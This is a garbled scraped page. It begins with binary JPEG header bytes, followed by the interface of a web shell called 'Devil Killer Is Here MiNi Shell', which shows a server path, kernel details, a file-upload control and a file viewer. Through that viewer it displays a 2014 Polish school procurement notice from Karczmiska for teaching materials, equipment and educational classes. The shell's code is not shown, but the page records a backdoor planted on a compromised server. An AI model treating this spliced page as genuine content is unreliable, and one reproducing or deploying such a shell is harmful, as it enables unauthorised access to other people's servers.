JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140818/177323-N-2014.html

<p class="kh_header"><b>Karczmiska: ZAKUP POMOCY DYDAKTYCZNYCH, MATERIAŁÓW, 
SPRZĘTU I WYPOSAŻENIA ORAZ USŁUG EDUKACYJNYCH dla potrzeb realizacji projektu Pasja poznania w ramach POKL współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 177323 - 2014; data zamieszczenia: 18.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Karczmiskach , ul. Szkolna 1, 24-310 Karczmiska, woj. lubelskie, tel. 81 828 70 34, faks 81 828 70 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zskarczmiska.szkolnastrona.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP POMOCY DYDAKTYCZNYCH, MATERIAŁÓW, 
SPRZĘTU I WYPOSAŻENIA ORAZ USŁUG EDUKACYJNYCH dla potrzeb realizacji projektu Pasja poznania w ramach POKL współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Zakup pomocy dydaktycznych, materiałów i wyposażenia. 
Opis przedmiotu zamówienia.
1.1.Szczegółowy wykaz i opis zamawianych pomocy dydaktycznych , materiałów 
i wyposażenia określa Załącznik Nr 1 do SIWZ.
1.2.Zaoferowane pomoce dydaktyczne muszą spełniać wymagane parametry lub być o parametrach nie gorszych od określonych w Załączniku Nr 1 do SIWZ.
1.3.Zaoferowane pomoce dydaktyczne, materiały i wyposażenie muszą posiadać wymagane dokumenty, certyfikaty, licencje dopuszczające je do użytku 
w szkole, jeśli przepisy tego wymagają. Dokumenty te wykonawca ma obowiązek dostarczyć wraz z pomocami dydaktycznymi, materiałami i wyposażeniem zamawiającemu.
1.4.Zaoferowane pomoce dydaktyczne, materiały i wyposażenie muszą być fabrycznie nowe, nieużywane.
1.5.Zamówienie obejmuje również:
1)dostarczenie zamówienia do wskazanych miejsc dostawy, 
2)montaż dostarczonych pomocy dydaktycznych, materiałów i wyposażenia 
w miejscu wskazanym przez zamawiającego, 
3)udzielenie gwarancji na 12 miesięcy oraz zagwarantowanie na ten czas serwisu gwarancyjnego, gwarancja nie dotyczy materiałów zużywalnych.

Część 2 - Zakup sprzętu elektronicznego, multimedialnego, komputerowego 
i oprogramowania. 
Opis przedmiotu zamówienia.
2.1.Szczegółowy wykaz i opis zamawianego sprzętu elektronicznego, multimedialnego, komputerowego i oprogramowania, określa Załącznik Nr 2 i Nr 2a do SIWZ. 
2.2.Zaoferowany sprzęt i oprogramowanie musi spełniać wymagane w opisie parametry lub być o parametrach nie gorszych od określonych w Załączniku Nr 2 i Nr 2a do SIWZ.
2.3.Zaoferowany sprzęt, oprogramowanie musi posiadać wymagane dokumenty, certyfikaty, licencje dopuszczające je do użytku w szkole, jeśli przepisy tego wymagają. Licencje na oprogramowanie, jeśli nie określa ich SIWZ muszą być bezterminowe. Dokumenty te wykonawca ma obowiązek dostarczyć wraz 
ze sprzętem zamawiającemu.
2.4.Wykonawca dołączy do sprzętu i oprogramowania stosowne dokumenty 
i materiały informacyjne, potwierdzające parametry techniczne na podstawie, których zamawiający dokona oceny zgodności z opisem przedmiotu zamówienia (katalogi, opisy opracowane przez producenta w języku polskim).
2.5.Zaoferowany sprzęt musi być fabrycznie nowy, nieużywany.
2.6.Usługa obejmuje również:
1)dostarczenie sprzętu i oprogramowania do wskazanych miejsc dostawy, 
2)montaż, instalację i uruchomienie dostarczonego sprzętu i oprogramowania,
3)szkolenie personelu w zakresie obsługi sprzętu i oprogramowania, 
4)dostarczenie wraz z zamówieniem wymaganej do obsługi instrukcji 
w języku polskim,
5)udzielenie gwarancji na 24 miesiące oraz zagwarantowanie na ten czas serwisu gwarancyjnego.

Część 3 - Zakup usług edukacyjnych.
Opis przedmiotu zamówienia.
3.1.Część 3.1.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. niemieckiego. Prowadzenie zajęć wyrównawczych z języka niemieckiego dla uczniów kl. III gimnazjum (5 grup): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 180 h.
3.2.Część 3.1.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. niemieckiego. Prowadzenie zajęć wyrównawczych z języka niemieckiego dla uczniów kl. III gimnazjum (4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.3.	Część 3.2.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z matematyki. Prowadzenie zajęć wyrównawczych z matematyki dla uczniów kl. III gimnazjum 
(5 grup): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 180 h.
3.4.Część 3.2.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z matematyki. Prowadzenie zajęć wyrównawczych z matematyki dla uczniów kl. III gimnazjum
(4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.5.Część 3.3 - Zakup usług edukacyjnych - zajęcia rozwijające z biologii. Prowadzenie zajęć rozwijających z biologii dla uczniów kl. I i II gimnazjum  (2 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 72 h.  
3.6.Część 3.4.a - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. angielskiego. Prowadzenie zajęć wyrównawczych z języka angielskiego dla uczniów kl. I gimnazjum (3 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 108 h.
3.7.Część 3.4.b - Zakup usług edukacyjnych - zajęcia wyrównawcze z j. angielskiego. Prowadzenie zajęć wyrównawczych z języka angielskiego dla uczniów kl. II gimnazjum (3 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 108 h.
3.8.Część 3.4.c - Zakup usług edukacyjnych - zajęcia rozwijające z j. angielskiego. Prowadzenie zajęć rozwijających z języka angielskiego dla uczniów kl. I i II gimnazjum (2 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 72 h.
3.9.Część 3.5 - Zakup usług edukacyjnych - zajęcia plastyczne. Prowadzenie zajęć plastycznych dla uczniów gimnazjum (2 grupy): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 144 h.
3.10.Część 3.6.a - Zakup usług edukacyjnych - zajęcia dziennikarsko-filmowe. Prowadzenie zajęć dziennikarsko-filmowych dla uczniów gimnazjum (1 grupa): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 72 h.
3.11.Część 3.6.b - Zakup usług edukacyjnych - zajęcia dziennikarsko-filmowe. Prowadzenie zajęć dziennikarsko-filmowych dla uczniów gimnazjum (1 grupa): średnio 2 godziny w tygodniu dla jednej grup, łącznie 72 h dla 1 grupy, razem 72 h.
3.12.Część 3.7.a - Zakup usług edukacyjnych - doradztwo zawodowe (konsultacje indywidualne). Prowadzenie zajęć z doradztwa zawodowego- konsultacji indywidualnych dla uczniów  kl. II i III gimnazjum  średnio 4 godz. w tygodniu, razem 144 h.
3.13.Część 3.7.b - Zakup usług edukacyjnych - doradztwo zawodowe. Prowadzenie zajęć z doradztwa zawodowego dla uczniów kl. II gimnazjum (8 grup): średnio 2 godz. w miesiącu dla jednej grupy, łącznie 20 h dla 1 grupy, razem 160 h.
3.14.	Część 3.7.c - Zakup usług edukacyjnych - doradztwo zawodowe. Prowadzenie zajęć z doradztwa zawodowego dla uczniów kl. II gimnazjum (9 grup): średnio 2 godz. w miesiącu dla jednej grupy, łącznie 20 h dla 1 grupy, razem 180 h.
3.15.	Część 3.8 - Zakup usług edukacyjnych - zajęcia logopedyczne. Prowadzenie zajęć logopedycznych dla uczniów gimnazjum (4 grupy): średnio 1 godzina w tygodniu dla jednej grup, łącznie 36 h dla 1 grupy, razem 144 h.
3.16.	Część 3.9 - Zakup usług edukacyjnych - konsultacje indywidualne z psychologiem. Prowadzenie przez psychologa konsultacji indywidualnych dla uczniów gimnazjum średnio 4 godz. w tygodniu, razem 144 h.
3.17.	Termin realizacji usługi od 01.09.2014 r. do 30.06.2015 r.

Uwaga: Jeżeli w opisie przedmiotu zamówienia pojawi się jakikolwiek znak towarowy, patent lub pochodzenie - należy przez to rozumieć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, które Zamawiający traktuje jako wzór, w oparciu o który wykonawca może złożyć ofertę na dostawę o parametrach równoważnych. Za parametry równoważne należy rozumieć nie gorsze niż zaproponowane przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.20.00.00-1, 48.90.00.00-8, 31.71.00.00-9, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia: 
1)pisemne oświadczenie o spełnieniu warunków i wymagań zawartych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, (Dz.U. z 2013 r. poz. 907 z póżn. zm.);
2)(dotyczy wyłącznie Części 3 zamówienia) dokument stwierdzający posiadanie uprawnień do prowadzenia zajęć, na które została złożona oferta; 
a)(dotyczy wyłącznie Część3.1 zamówienia) osoba posiada kwalifikacje do nauczania j. niemieckiego, co najmniej na poziomie gimnazjum;  
b)(dotyczy wyłącznie Część 2.2 zamówienia) osoba posiada kwalifikacje do nauczania 
matematyki, co najmniej na poziomie gimnazjum;  
c)(dotyczy wyłącznie Część 3.3 zamówienia) osoba posiada kwalifikacje do nauczania 
biologii, co najmniej na poziomie gimnazjum;  
d)(dotyczy wyłącznie Część 3.4 zamówienia) osoba posiada kwalifikacje do nauczania 
j. angielskiego, co najmniej na poziomie gimnazjum;  
e)(dotyczy wyłącznie Część 3.5 zamówienia) osoba posiada kwalifikacje do nauczania 
plastyki, co najmniej na poziomie gimnazjum lub przygotowanie plastyczne
 i co najmniej roczne doświadczenie w pracy z młodzieżą;
f)(dotyczy wyłącznie Część 3.6 zamówienia) osoba posiada kwalifikacje do nauczania, 
co najmniej na poziomie gimnazjum i roczne doświadczenie w prowadzeniu podobnego typu zajęć lub przygotowanie dziennikarskie lub filmowe i co najmniej roczne doświadczenie w prowadzeniu zajęć podobnego typu;
g)(dotyczy wyłącznie Część 3.7 zamówienia) osoba posiada kwalifikacje do nauczania, co najmniej na poziomie gimnazjum zajmująca stanowisko pedagoga lub doradcy zawodowego lub osoba zatrudniona w dowolnej instytucji zajmująca się doradztwem zawodowym;
h)(dotyczy wyłącznie Część 3.8 zamówienia) osoba posiadająca kwalifikacje 
do prowadzenia zajęć logopedycznych i co najmniej dwuletnią praktykę w prowadzeniu zajęć logopedycznych; 
i)(dotyczy wyłącznie Część 3.9 zamówienia) osoba posiada ukończone studia wyższe magisterskie z psychologii i jest lub była zatrudniona w poradni psychologiczno pedagogicznej;
3)(dotyczy wyłącznie Części 3 zamówienia) pisemne oświadczenie o zatrudnieniu 
i zatrudnieniu w innych projektach PO KL, łączna liczba godzin pracy osoby fizycznej nie może przekroczyć 240 godzin miesięcznie;
4)pisemne oświadczenie o zatrudnieniu w instytucji realizującej PO KL, wykonawca usługi nie może być zatrudniony w instytucji realizującej PO KL;
5)pisemne oświadczenie o braku powiązań osobowych i kapitałowych z Zamawiającym, wykonawca usługi nie może być powiązany osobowo i kapitałowo z Zamawiającym;
6)koncesja, zezwolenie, licencja lub inny dokument świadczący o posiadaniu uprawnień do realizacji zamówienia (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia: 
1)(dotyczy wyłącznie Części 3 zamówienia, w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany) dokument świadczący, 
o co najmniej rocznej praktyce w prowadzeniu działalności szkoleniowej /edukacyjnej;
2)(dotyczy wyłącznie Części 3.8 zamówienia) dokument świadczący, o co najmniej dwuletniej praktyce w prowadzeniu zajęć logopedycznych;
3)(dotyczy wyłącznie Części 3.9 zamówienia) dokument świadczący o aktualnym lub byłym zatrudnieniu w poradni psychologiczno pedagogicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia: 
1)pisemne oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania usługi (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia: 
1)pisemne oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania usługi (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku będzie dokonana w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia: 
1)pisemne oświadczenie, że wykonawca znajduje się w sytuacji finansowej pozwalającej na realizację usługi zamówienia (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemna oferta z pisemną propozycją ceny ryczałtowej netto - wzór oferty Załączniku Nr 3 do SIWZ. 
2.(dotyczy wyłącznie Części 1, 2 zamówienia) Szczegółowy wykaz wraz z opisem oferowanego przedmiotu zamówienia  - wzór Załączniku Nr 4 do SIWZ. Można skorzystać z załączników Nr 1,2, 2a pamiętając o ich podpisaniu.
3.Pisemne oświadczenie o spełnieniu warunków udziału w postępowaniu oraz akceptacji warunków i wymagań zawartych w specyfikacji i przyjęcie ich bez zastrzeżeń - wzór Załączniku Nr 5 do SIWZ.
4.(dotyczy wyłącznie Części 3 zamówienia) Deklaracja udziału w projekcie  - wzór Załącznik Nr 6 do SIWZ. (Deklarację załączają do oferty tylko osoby fizyczne. W przypadku firm podpisane deklaracje przez osoby prowadzące zajęcia będą musiały zostać dołączone 
do umowy).
5.(dotyczy wyłącznie Części 3 zamówienia) Oświadczenie o zatrudnieniu i zatrudnieniu w innych projektach PO KL  - wzór Załącznik Nr 7 do SIWZ. Oświadczenie załączają doferty tylko osoby fizyczne. (W przypadku firm podpisane oświadczenie przez osoby prowadzące zajęcia będą musiały zostać dołączone do umowy).
6.(dotyczy wyłącznie Części 3 zamówienia) Oświadczenie o zatrudnieniu w instytucji realizującej PO KL - wzór Załącznik Nr 8 do SIWZ. (W przypadku firm dodatkowo podpisane oświadczenie przez osoby prowadzące zajęcia będą musiały zostać dołączone do umowy).
7.Oświadczenie o braku powiązań osobowych i kapitałowych z Zamawiającym - wzór Załącznik Nr 9 do SIWZ. 
8.Pisemne oświadczenie o spełnieniu warunków i wymagań zawartych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, (Dz.U. z 2013 r. poz. 907 z póżn. zm.) - wzór Załączniku Nr 10 do SIWZ.
9.(dotyczy wyłącznie Części 3 zamówienia) Dokument stwierdzający posiadanie uprawnień do prowadzenia zajęć, na które została złożona oferta potwierdzony za zgodność z oryginałem. (Dokument załączają do oferty tylko osoby fizyczne.  
W przypadku firm dokumenty osób prowadzących zajęcia stwierdzające posiadanie uprawnień do prowadzenia zajęć, na które została złożona oferta będą musiały zostać dołączone do umowy). 
10.(dotyczy wyłącznie Części 3 zamówienia) Kserokopia dokumentu tożsamości osoby prowadzącej zajęcia potwierdzona za zgodność z oryginałem. (Dokument tożsamości potwierdzony za zgodność z oryginałem załączają do oferty tylko osoby fizyczne.  W przypadku firm dokumenty tożsamości osób prowadzących zajęcia potwierdzone za zgodność z oryginałem będą musiały zostać dołączone do umowy).
11.Koncesja, zezwolenie, licencja lub inny dokument świadczący o posiadaniu uprawnień do realizacji zamówienia (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany). 
12.(dotyczy wyłącznie Części 3 zamówienia) Dokument świadczący, o co najmniej rocznej praktyce w prowadzeniu działalności szkoleniowej/edukacyjnej. (W przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany).
13.(dotyczy wyłącznie Części 3.8 zamówienia) Dokument świadczący, o co najmniej dwuletniej praktyce w prowadzeniu zajęć logopedycznych.
14.(dotyczy wyłącznie Części 3.9 zamówienia) Dokument świadczący o aktualnym lub byłym zatrudnieniu w poradni psychologiczno pedagogicznej.
W celu potwierdzenia, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia.
15.Pisemne oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania usługi - wzór Załączniku Nr 11 do SIWZ.W celu potwierdzenia, że sytuacja ekonomiczna i finansowa wykonawcy pozwala na realizację zamówienia.
16.Pisemne oświadczenie, że wykonawca znajduje się w sytuacji finansowej pozwalającej na realizację usługi zamówienia (w przypadku złożenia oferty na Część 3 zamówienia przez osoby fizyczne dokument nie jest wymagany) - wzór Załączniku Nr 12 do SIWZ.
17.Pisemne oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych - wzór Załączniku Nr 13 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1Zamawiający dopuszcza możliwość zmiany postanowień umowy w stosunku do treści 
w przypadku, gdy:
a)konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia; w przypadku wystąpienia siły wyższej (siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
